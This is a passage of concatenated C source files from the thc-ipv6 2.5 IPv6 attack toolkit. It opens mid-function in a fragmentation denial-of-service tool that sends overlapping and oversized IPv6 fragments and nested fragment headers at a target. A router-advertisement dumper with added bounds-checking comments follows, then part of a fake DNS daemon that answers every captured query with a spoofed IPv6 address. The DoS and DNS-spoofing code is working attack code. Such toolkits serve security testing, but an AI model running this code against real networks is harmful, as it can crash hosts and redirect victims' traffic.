NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 51 + i * 177, 1, 0xfacebabe + getpid() + count + curr)) return -1; if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, 1416)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore } if (flood == 0 || curr == 0) printf(" Sending fragment %d (preparation fragment)\n", i + 2); pkt3 = thc_destroy_packet(pkt3); hdr = (thc_ipv6_hdr *) pkt; if ((pkt3 = thc_create_ipv6_extended(interface, 
PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, tos, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 51 + 45 * 177, 1, 0xfacebabe + getpid() + count + curr)) return -1; if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, (8190 - (51 + 45 * 177)) * 8)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore if (!flood) sleep(1); if (flood == 0 || curr == 0) printf(" Sending final fragment with 8191 and sending 8 bytes\n"); pkt3 = thc_destroy_packet(pkt3); hdr = (thc_ipv6_hdr *) pkt; if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, tos, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 8191, 0, 0xfacebabe + getpid() + count + curr)) return -1; if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, 8)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore if (!flood) sleep(1); curr++; } curr = 0; if (only == ++count || only == 0) while (curr < resend || flood) { if (flood == 0 || curr == 0) printf("ATTACK DOS %d - last fragment at 8191 + 9 bytes\n", count); if (flood == 0 || curr == 0) printf(" Sending first fragment\n"); pkt3 = thc_destroy_packet(pkt3); hdr = (thc_ipv6_hdr *) pkt; if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, ++tos, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 0, 1, 0xfacebabe + getpid() + count + curr)) return -1; memcpy(buf, hdr->pkt + 40 + offset, 400 + 8); if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, 408)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore if (!flood) sleep(1); memset(buf, 'A', sizeof(buf)); if (flood == 0 || curr == 0) printf(" Sending fragments 2-46\n"); for (i = 0; i < 45; i++) { pkt3 = thc_destroy_packet(pkt3); hdr = (thc_ipv6_hdr *) pkt; if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, tos, 0)) == 
NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 51 + i * 177, 1, 0xfacebabe + getpid() + count + curr)) return -1; if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, 1416)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore } if (flood == 0 || curr == 0) printf(" Sending fragment %d (preparation fragment)\n", i + 2); pkt3 = thc_destroy_packet(pkt3); hdr = (thc_ipv6_hdr *) pkt; if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, tos, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 51 + 45 * 177, 1, 0xfacebabe + getpid() + count + curr)) return -1; if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, (8190 - (51 + 45 * 177)))) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore if (!flood) sleep(1); if (flood == 0 || curr == 0) printf(" Sending final fragment with 8191 and sending 9 bytes\n"); pkt3 = thc_destroy_packet(pkt3); hdr = (thc_ipv6_hdr *) pkt; if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, tos, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 8191, 0, 0xfacebabe + getpid() + count + curr)) return -1; if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, 9)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore if (!flood) sleep(1); curr++; } curr = 0; if (only == ++count || only == 0) while (curr < resend || flood) { if (flood == 0 || curr == 0) printf("ATTACK DOS %d - last fragment at 8191 + 1414 bytes\n", count); if (flood == 0 || curr == 0) printf(" Sending first fragment\n"); pkt3 = thc_destroy_packet(pkt3); hdr = (thc_ipv6_hdr *) pkt; if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, ++tos, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 0, 1, 0xfacebabe + getpid() + count + curr)) return -1; memcpy(buf, hdr->pkt + 40 + offset, 
400 + 8); if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, 408)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore if (!flood) sleep(1); memset(buf, 'A', sizeof(buf)); if (flood == 0 || curr == 0) printf(" Sending fragments 2-46\n"); for (i = 0; i < 45; i++) { pkt3 = thc_destroy_packet(pkt3); hdr = (thc_ipv6_hdr *) pkt; if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, tos, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 51 + i * 177, 1, 0xfacebabe + getpid() + count + curr)) return -1; if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, 1416)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore } if (flood == 0 || curr == 0) printf(" Sending fragment %d (preparation fragment)\n", i + 2); pkt3 = thc_destroy_packet(pkt3); hdr = (thc_ipv6_hdr *) pkt; if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, tos, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 51 + 45 * 177, 1, 0xfacebabe + getpid() + count + curr)) return -1; if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, (8190 - (51 + 45 * 177)))) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore if (!flood) sleep(1); if (flood == 0 || curr == 0) printf(" Sending final fragment with 8191 and sending 1414 bytes\n"); pkt3 = thc_destroy_packet(pkt3); hdr = (thc_ipv6_hdr *) pkt; if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, tos, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 8191, 0, 0xfacebabe + getpid() + count + curr)) return -1; if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, 1414)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore if (!flood) sleep(1); curr++; } if (only == ++count || only == 0) while (curr < resend || flood) { if (flood == 0 || 
curr == 0) printf("Multifragment %d - Level 1\n", count); hdr = (thc_ipv6_hdr *) pkt; if (flood == 0 || curr == 0) printf(" 1: A-first + B-first\n"); pkt3 = thc_destroy_packet(pkt3); if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, 0, 0)) == NULL) return -1; // if (thc_add_hdr_fragment(pkt3, &pkt_len3, 0, 0, 0x3aaaa)) // return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 0, 1, 0x3bbbb)) return -1; memcpy(buf, hdr->pkt + 40 + offset, 200); if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, 200)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore if (flood == 0 || curr == 0) printf(" 2: B\n"); pkt3 = thc_destroy_packet(pkt3); if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 25, 1, 0x3bbbb)) return -1; memcpy(buf, hdr->pkt + 40 + offset + 200, 200); if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, 200)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore if (flood == 0 || curr == 0) printf(" 3: B\n"); pkt3 = thc_destroy_packet(pkt3); if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 25*2, 1, 0x3bbbb)) return -1; memcpy(buf, hdr->pkt + 40 + offset + 200 * 2, 200); if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, 200)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore if (flood == 0 || curr == 0) printf(" 4: B-last\n"); pkt3 = thc_destroy_packet(pkt3); if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 25*3, 1, 0x3bbbb)) return -1; memcpy(buf, hdr->pkt + 40 + offset + 200 * 3, 608); if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, 608)) 
return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore curr++; } //tmp if (only == ++count || only == 0) while (curr < resend || flood) { if (flood == 0 || curr == 0) printf("Multifragment %d - Level 2\n", count); hdr = (thc_ipv6_hdr *) pkt; if (flood == 0 || curr == 0) printf(" 1: A-first + B-first\n"); pkt3 = thc_destroy_packet(pkt3); if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 0, 1, 0x1aaaa)) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 0, 1, 0x1bbbb)) return -1; memcpy(buf, hdr->pkt + 40 + offset, 200); if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, 200)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore if (flood == 0 || curr == 0) printf(" 2: A-last (B)\n"); pkt3 = thc_destroy_packet(pkt3); if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 25 + 1, 0, 0x1aaaa)) return -1; memcpy(buf, hdr->pkt + 40 + offset + 200, 200); if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, 200)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore if (flood == 0 || curr == 0) printf(" 3: B\n"); pkt3 = thc_destroy_packet(pkt3); if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 25*2, 1, 0x1bbbb)) return -1; memcpy(buf, hdr->pkt + 40 + offset + 200 * 2, 200); if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, 200)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore if (flood == 0 || curr == 0) printf(" 4: B-last\n"); pkt3 = thc_destroy_packet(pkt3); if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, 0, 0)) == 
NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 25*3, 0, 0x1bbbb)) return -1; memcpy(buf, hdr->pkt + 40 + offset + 200 * 3, 608); if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, 608)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore curr++; } //tmp if (only == ++count || only == 0) while (curr < resend || flood) { if (flood == 0 || curr == 0) printf("Multifragment %d - Level 3\n", count); hdr = (thc_ipv6_hdr *) pkt; if (flood == 0 || curr == 0) printf(" 1: A-first + B-first + C-first\n"); pkt3 = thc_destroy_packet(pkt3); if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 0, 1, 0x2aaaa)) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 0, 1, 0x2bbbb)) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 0, 1, 0x2cccc)) return -1; memcpy(buf, hdr->pkt + 40 + offset, 200); if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, 200)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore if (flood == 0 || curr == 0) printf(" 2: A-last (B/C)\n"); pkt3 = thc_destroy_packet(pkt3); if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 25 + 2, 0, 0x2aaaa)) return -1; memcpy(buf, hdr->pkt + 40 + offset + 200, 200); if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, 200)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore if (flood == 0 || curr == 0) printf(" 3: B-last (C)\n"); pkt3 = thc_destroy_packet(pkt3); if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 25*2 + 1, 0, 0x2bbbb)) return -1; memcpy(buf, hdr->pkt + 40 + offset + 200 * 2, 200); if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, 
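200)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore if (flood == 0 || curr == 0) printf(" 4: C-last\n"); pkt3 = thc_destroy_packet(pkt3); if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 25*3, 0, 0x2cccc)) return -1; memcpy(buf, hdr->pkt + 40 + offset + 200 * 3, 608); if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, 608)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore curr++; } if (flood == 0 || curr == 0) printf("ATTACK finalisation\n"); if (ping) { if (flood == 0 || curr == 0) printf(" Sending final ping to %s\n", argv[optind + 1]); thc_ping6(interface, src6, dst6, 10, 1); sleep(1); } if (flood == 0 || curr == 0) printf("ATTACK END\n"); return 0; } thc-ipv6-2.5/dump_router6.c0000644000000000000000000001550312251022435014315 0ustar rootroot
#include #include #include #include #include #include #include #include #include #include #include "thc-ipv6.h"

#define MAX_SEEN 255

char *frbuf, *frbuf2, *frint, buf3[1504];
int frbuflen, frbuf2len, do_hop = 0, do_frag = 0, do_dst = 0, type = NXT_ICMP6, seen_cnt = 0;
unsigned char *frip6, *frmac, *frdst;
thc_ipv6_hdr *frhdr = NULL;
char seen[MAX_SEEN + 1][16];    /* source addresses of routers already printed */

extern int do_hdr_size;

/* Print usage for dump_router6 and terminate with exit status -1. */
void help(char *prg) {
  printf("%s %s (c) 2013 by %s %s\n\n", prg, VERSION, AUTHOR, RESOURCE);
  printf("Syntax: %s interface [target]\n\n", prg);
  printf("Dumps all local routers and their information\n\n");
// printf("Use -r to use raw mode.\n\n");
  exit(-1);
}

/*
 * Read a 32-bit big-endian value. The bytes are widened to unsigned int
 * before shifting so a top byte >= 0x80 is never shifted into the sign bit
 * of a promoted int.
 */
static unsigned int ra_be32(const unsigned char *p) {
  return ((unsigned int) p[0] << 24) | ((unsigned int) p[1] << 16) | ((unsigned int) p[2] << 8) | (unsigned int) p[3];
}

/* Print the preference encoded in bits 3-4 (mask 24) of a flags byte. */
static void ra_print_priority(int flags) {
  switch (flags & 24) {
  case 0:
    printf("medium\n");
    break;
  case 8:
    printf("high\n");
    break;
  case 16:
    printf("reserved value\n");
    break;
  case 24:
    printf("low\n");
    break;
  }
}

/*
 * pcap callback: decode one captured ICMPv6 router advertisement and print
 * its fields and options. Every byte handled here comes from the network and
 * is untrusted, so all lengths are checked before the corresponding bytes
 * are read, and the capture buffer is never written to.
 *
 * foo     unused user pointer passed through by pcap
 * header  pcap record header; only caplen is used
 * data    captured frame, starting at the link-layer header
 *
 * Each source address is printed once; repeats are dropped via seen[].
 * The ICMPv6 header is expected directly after the 40-byte IPv6 header
 * (next-header byte == NXT_ICMP6); packets with extension headers are skipped.
 */
void dump_ra_reply(u_char *foo, const struct pcap_pkthdr *header, const unsigned char *data) {
  unsigned char *ipv6hdr, *ptr;
  char *addr;
  int i, j, optlen, len;
  int hdr_len = do_hdr_size > 0 ? do_hdr_size : 14;     /* link-layer header size */

  /* Length first: 40 bytes IPv6 + 16 bytes RA header must be captured before
     any of them is inspected (the original read ipv6hdr[40] before testing
     the length). */
  if (header->caplen < (unsigned int) hdr_len + 40 + 16)
    return;
  len = (int) (header->caplen - (unsigned int) hdr_len);
  ipv6hdr = (unsigned char *) (data + hdr_len);

  if (do_hdr_size > 0 && (ipv6hdr[0] & 240) != 0x60)    /* not IP version 6 */
    return;
  if (ipv6hdr[6] != NXT_ICMP6 || ipv6hdr[40] != ICMP6_ROUTERADV)
    return;

  /* Skip routers that were already reported. */
  for (i = 0; i < seen_cnt; i++)
    if (memcmp(seen[i], ipv6hdr + 8, 16) == 0)
      return;
  if (seen_cnt <= MAX_SEEN)
    memcpy(seen[seen_cnt++], ipv6hdr + 8, 16);

  /* thc_ipv62notation() appears to return a heap string (check_packets() in
     fake_dns6d.c of this package frees it), so it is released after use
     instead of being leaked per packet -- TODO confirm against the library. */
  addr = (char *) thc_ipv62notation(ipv6hdr + 8);
  printf("Router: %s (MAC: %02x:%02x:%02x:%02x:%02x:%02x)\n", addr, data[6], data[7], data[8], data[9], data[10], data[11]);
  free(addr);

  printf(" Priority: ");
  ra_print_priority(ipv6hdr[45]);
  printf(" Hop Count: %d\n", ipv6hdr[44]);
  printf(" Lifetime: %d, Reachable: %u, Retrans: %u\n", (ipv6hdr[46] << 8) + ipv6hdr[47], ra_be32(ipv6hdr + 48), ra_be32(ipv6hdr + 52));
  printf(" Flags: ");
  if ((ipv6hdr[45] & 128) > 0)
    printf("managed ");
  else
    printf("NOTmanaged ");
  if ((ipv6hdr[45] & 64) > 0)
    printf("other ");
  else
    printf("NOTother ");
  if ((ipv6hdr[45] & 32) > 0)
    printf("home-agent ");
  else
    printf("NOThome-agent ");
  if ((ipv6hdr[45] & 4) > 0)
    printf("proxied ");
  else
    printf("NOTproxied ");
  if ((ipv6hdr[45] & 2) > 0)
    printf("RESERVED-2-BIT-SET ");
  if ((ipv6hdr[45] & 1) > 0)
    printf("RESERVED-1-BIT-SET");
  printf("\n");

  i = len - 56;                 /* bytes of options left */
  ptr = ipv6hdr + 56;
  printf(" Options:\n");
  while (i > 0) {
    /* ptr[1] is the option length in units of 8 bytes; it must be non-zero
       and fit into what is left of the packet. */
    if (i < 8 || ptr[1] * 8 > i || ptr[1] == 0) {
      printf("Packet truncated!\n\n");
      return;
    }
    optlen = ptr[1] * 8;
    switch (*ptr) {
    case 1:
      printf(" MAC: %02x:%02x:%02x:%02x:%02x:%02x\n", ptr[2], ptr[3], ptr[4], ptr[5], ptr[6], ptr[7]);
      break;
    case 3:
      if (ptr[1] != 4)
        printf(" Prefix: illegal\n");
      else {
        addr = (char *) thc_ipv62notation(ptr + 16);
        printf(" Prefix: %s/%d (Valid: %u, Preferred: %u)\n", addr, ptr[2], ra_be32(ptr + 4), ra_be32(ptr + 8));
        free(addr);
        printf(" Flags:");
        if ((ptr[3] & 128) > 0)
          printf(" On-Link");
        else
          printf(" NOT-on-link");
        if ((ptr[3] & 64) > 0)
          printf(" Autoconfig");
        else
          printf(" NOT-autoconfig");
        if ((ptr[3] & 63) > 0)
          printf(" RESERVED-BITS-SET-%d", ptr[3] & 63);
        printf("\n");
      }
      break;
    case 5:
      /* %u: the value is an unsigned 32-bit field */
      printf(" MTU: %u\n", ra_be32(ptr + 4));
      break;
    case 24:
      if (ptr[1] != 3)
        printf(" Route: illegal\n");
      else {
        addr = (char *) thc_ipv62notation(ptr + 8);
        printf(" Route: %s/%d (Lifetime: %u/%u)\n", addr, ptr[2], ra_be32(ptr + 4), ra_be32(ptr + 8));
        free(addr);
        printf(" Priority:");
        ra_print_priority(ptr[3]);
      }
      break;
    case 31:
      /* The name is printed byte by byte and only up to the end of this
         option. The original scanned for a NUL without any bound and
         rewrote control bytes inside the const capture buffer, so an
         advertisement without a terminator made it read (and write) past
         the option and possibly past the packet. */
      printf(" DNS Searchlist: ");
      for (j = 9; j < optlen && ptr[j] != 0; j++)
        putchar(ptr[j] < 32 ? '.' : ptr[j]);
      printf(" (Lifetime: %u)\n", ra_be32(ptr + 4));
      break;
    case 25:
      if (ptr[1] != 3)
        printf(" DNS: illegal\n");
      else {
        addr = (char *) thc_ipv62notation(ptr + 8);
        printf(" DNS: %s (Lifetime: %u/%u)\n", addr, ra_be32(ptr + 4), ra_be32(ptr + 8));
        free(addr);
      }
      break;
    default:
      printf(" Unknown Option Type: %d (size: %d bytes)\n", ptr[0], optlen);
    }
    i -= optlen;
    ptr += optlen;
  }
  printf("\n");
}

/* SIGALRM handler: ends the listening period. */
void clean_exit(int sig) {
  exit(0);
}

/*
 * dump_router6: send one router solicitation on the interface (to ff02::2
 * or to the given target) and print every router advertisement captured
 * during the following 5 seconds.
 */
int main(int argc, char *argv[]) {
  char *interface, string[] = "ip6 and icmp6";
  unsigned char *mac6, buf[512];
  unsigned char *dst = thc_resolve6("ff02::2");
  int i;
  unsigned char *pkt = NULL;
  int pkt_len = 0;
  int rawmode = 0;
  pcap_t *p;

  if (argc < 2 || strncmp(argv[1], "-h", 2) == 0)
    help(argv[0]);

  while ((i = getopt(argc, argv, "r")) >= 0) {
    switch (i) {
    case 'r':
      thc_ipv6_rawmode(1);
      rawmode = 1;
      break;
    default:
      fprintf(stderr, "Error: invalid option %c\n", i);
      exit(-1);
    }
  }

  /* Options only, no interface: argv[optind] would be NULL. */
  if (optind >= argc)
    help(argv[0]);

  interface = argv[optind];
  if ((mac6 = thc_get_own_mac(interface)) == NULL) {
    fprintf(stderr, "Error: invalid interface %s\n", interface);
    exit(-1);
  }
  if (argc - optind > 1 && argv[optind + 1] != NULL)
    if ((dst = thc_resolve6(argv[optind + 1])) == NULL) {
      fprintf(stderr, "Error: can not resolve %s\n", argv[optind + 1]);
      exit(-1);
    }

  /* ICMPv6 option payload: type 1, length 1 (8 bytes), own MAC address. */
  memset(buf, 0, sizeof(buf));
  buf[0] = 1;
  buf[1] = 1;
  memcpy(buf + 2, mac6, 6);
  i = 8;

  memset(seen, 0, sizeof(seen));

  if ((p = thc_pcap_init(interface, string)) == NULL) {
    fprintf(stderr, "Error: could not capture on interface %s with string %s\n", interface, string);
    exit(-1);
  }

  if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, NULL, dst, 255, 0, 0, 0xe0, 0)) == NULL)
    return -1;
  if (thc_add_icmp6(pkt, &pkt_len, ICMP6_ROUTERSOL, 0, 0, buf, i, 0) < 0)
    return -1;
  if (thc_generate_and_send_pkt(interface, mac6, NULL, pkt, &pkt_len) < 0)
    return -1;

  /* Collect replies until the alarm fires. */
  signal(SIGALRM, clean_exit);
  alarm(5);
  while (1) {
    while (thc_pcap_check(p, (char *) dump_ra_reply, NULL) > 0);
    usleep(100);
  }

  return 0;
}
thc-ipv6-2.5/fake_dns6d.c0000644000000000000000000001475412251022435013675 0ustar rootroot#include #include #include #include #include #include #include #include #include #include #include #include #include "thc-ipv6.h" char mybuf[1024], mybuf2[28], *interface, lookup[256]; int mlen, rawmode = 0; char *mac6, *ip6; void help(char *prg) { printf("%s %s (c) 2013 by %s %s\n\n", prg, VERSION, AUTHOR, RESOURCE); printf("Syntax: %s interface ipv6-address [fake-ipv6-address [fake-mac]]\n", prg); printf("Fake DNS server that serves the same IPv6 address to any lookup request\n"); printf("You can use this together with parasite6 if clients have a fixed DNS server\n"); printf("Note: very simple server. Does not honor multiple queries in a packet, nor"); printf("NS, MX, etc. 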
lookups.\n"); exit(-1); }

/*
 * pcap callback for fake_dns6d: handles one captured IPv6/UDP packet that
 * matched the capture filter installed in main() (dst port 53 or 5353).
 *
 * It builds a DNS reply in mybuf (header template prepared in main(), the
 * query's transaction id, the captured bytes from offset 60 onwards, and the
 * fixed 28-byte AAAA record from mybuf2), sends it back with addresses and
 * ports swapped, and prints the requested name.
 *
 * foo     unused user pointer passed through by pcap
 * header  pcap record header; only caplen is used
 * data    captured frame
 *
 * Offsets are relative to the start of the IPv6 header and assume UDP follows
 * directly at offset 40 -- NOTE(review): the next-header byte is not checked
 * here; presumably the capture filter takes care of that, confirm.
 */
void check_packets(u_char *foo, const struct pcap_pkthdr *header, const unsigned char *data) {
  unsigned char *ptr = (unsigned char *) data, *ptr2, *ptr3, *dst6, *src6, *dmac = NULL, *pkt, *look, *lwrite = lookup;
  unsigned short int sport, dport;
  int len = header->caplen, plen = mlen, pkt_len;

  /* Strip the link-layer header unless raw mode is on. */
  if (!rawmode) {
    if (do_hdr_size) {
      len -= do_hdr_size;
      ptr += do_hdr_size;
      if ((ptr[0] & 240) != 0x60)
        return;
      // dmac is ignored anyway
    } else {
      dmac = ptr + 6;           /* bytes 6..11 of the frame: sender MAC, used as reply destination */
      len -= 14;
      ptr += 14;
    }
  }

  /* Size window keeps the copy below inside mybuf (12 + 740 + 28 bytes at
     most); byte 50 is the byte after the transaction id, packets with its
     top bit set are ignored. */
  if (len < 70 || len > 800 || ptr[50] >= 128)
    return;
  look = ptr + 61;              /* first character of the first name label */
  mybuf[0] = ptr[48];           // copy txid
  mybuf[1] = ptr[49];
  sport = ptr[42] * 256 + ptr[43];      /* reply source port = query destination port */
  dport = ptr[40] * 256 + ptr[41];      /* reply destination port = query source port */
  src6 = ptr + 24;              /* query destination address */
  dst6 = ptr + 8;               /* query source address */
  memcpy(mybuf + plen, ptr + 60, len - 60);
  plen += (len - 60);
  memcpy(mybuf + plen, mybuf2, sizeof(mybuf2));
  plen += sizeof(mybuf2);

  /* The condition is true when the query was sent to a multicast address
     (ff0x::...); in that case the configured ip6 is used as reply source. */
  if (src6[0] == 0xff && src6[1] < 16)
    src6 = ip6;

  if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, src6, dst6, 0, 0, 0, 0, 0)) == NULL)
    return;
  if (thc_add_udp(pkt, &pkt_len, sport, dport, 0, mybuf, plen) < 0)
    return;
  thc_generate_and_send_pkt(interface, mac6, dmac, pkt, &pkt_len);

  /* Copy the queried name into lookup[] for display, turning bytes below '0'
     (label length bytes) into dots. The loop stops at the name terminator,
     4 bytes before the end of the packet, or after 255 characters, which is
     what lookup[256] can hold including the terminator. */
  do {
    if (*look > 0 && *look < '0')
      *lwrite = '.';
    else
      *lwrite = *look;
    look++;
    lwrite++;
  } while (*look != 0 && look <= ptr + len - 4 && look <= ptr + 255 + 60);
  *lwrite = 0;

  ptr2 = thc_ipv62notation(dst6);
  ptr3 = thc_ipv62notation(src6);
  printf("Spoofed %s to %s as source %s\n", lookup, ptr2, ptr3);
  free(ptr2);
  free(ptr3);
}

/*
 * fake_dns6d: parse the command line, prepare the DNS reply templates
 * (mybuf: 12-byte header, mybuf2: 28-byte AAAA record for argv[2]) and hand
 * every captured DNS/mDNS query on the interface to check_packets().
 * Runs until interrupted.
 */
int main(int argc, char *argv[]) {
  char mac[16] = "", *routerip6, *ptr;
  pcap_t *p;
/* char rdatabuf[1024], wdatabuf[1024], cmsgbuf[1024]; */
// int size, i, j, k, l, m, s, len, t, u, csize = 0;
/* socklen_t fromlen; static struct iovec iov; struct sockaddr_storage from; struct msghdr mhdr; struct sockaddr_in6 ddst; unsigned long long int count = 0;*/

  if (argc < 3 || strncmp(argv[1], "-h", 2) == 0)
    help(argv[0]);

  if (strcmp(argv[1], "-r") == 0) {     // is ignored
    argv++;
    argc--;
    thc_ipv6_rawmode(1);
    rawmode = 1;
  }

  memset(mac, 0, sizeof(mac));
  mac6 = mac;
  interface = argv[1];
  /* NOTE(review): each %x stores a whole unsigned int through a pointer into
     the char array mac[]; the result depends on byte order and on later
     stores overwriting the upper bytes of earlier ones. The return value of
     sscanf() is not checked. */
  if (argc >= 5 && (ptr = argv[4]) != NULL)
    sscanf(ptr, "%x:%x:%x:%x:%x:%x", (unsigned int *) &mac[0], (unsigned int *) &mac[1], (unsigned int *) &mac[2], (unsigned int *) &mac[3], (unsigned int *) &mac[4], (unsigned int *) &mac[5]);
  else
    mac6 = thc_get_own_mac(interface);

